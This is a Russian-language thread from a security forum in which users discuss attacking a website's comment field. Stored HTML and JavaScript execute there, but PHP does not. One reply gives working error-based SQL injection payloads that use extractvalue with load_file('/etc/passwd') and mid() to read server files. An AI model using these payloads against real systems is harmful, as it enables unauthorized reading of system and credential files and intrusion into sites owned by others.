ANTICHAT — форум по информационной безопасности, OSINT и технологиям

да, код не обрабатываеться интерпретатором. Если программист сильно не перестарался то ничего не выйдет.

phpinfo(); таким способом я пробовал уже) не выводит phpinfo (

значит копай в другую сторону

откуда тогда знаешь что админ не видит коменарий?

Узнавал через знакомого модератора, модератор узнавал у админа.

Да и логически подумать, на сайте куева туча пользователей, ежедневно одного и того же пользователя добавляют в ЧС 10 - 20 человек.

Вообщем инфа 100% что админ не видит.

да какой

php код выполняется на стороне сервера, а в браузере может сработать только javascript

Есть инъекция вида:

extractvalue(1,concat(0x5c,(SELECT substring((*),1,32) FROM * limit 0,1)))

С правами file_priv='Y'.

Как помощью ее, можно читать файли на сервере?

extractvalue(1,concat(0x5c,(SELECT load_file('/etc/passwd')))) выведет только 31 символ, далее используй mid

mid(load_file('/etc/passwd'),1,30)

c 1 символа выводим 30 символов

Ты видимо не читал предыдущие посты, либо не совсем понял в чем проблема.

Ссылка идет вида http://megasite.ru/member.html?id=54321

При добавлении коментария Если добавлть html код, он отлично врезается в страницу и выполняется, java script тоже выполняется. А вот когда добавляешь php код например то он не выполняется потому что стоит какой то чудо фильтр на

Konqi,капать там больше некуда) вот добавили этот баговый коментарий к добавлению мембера в ЧС)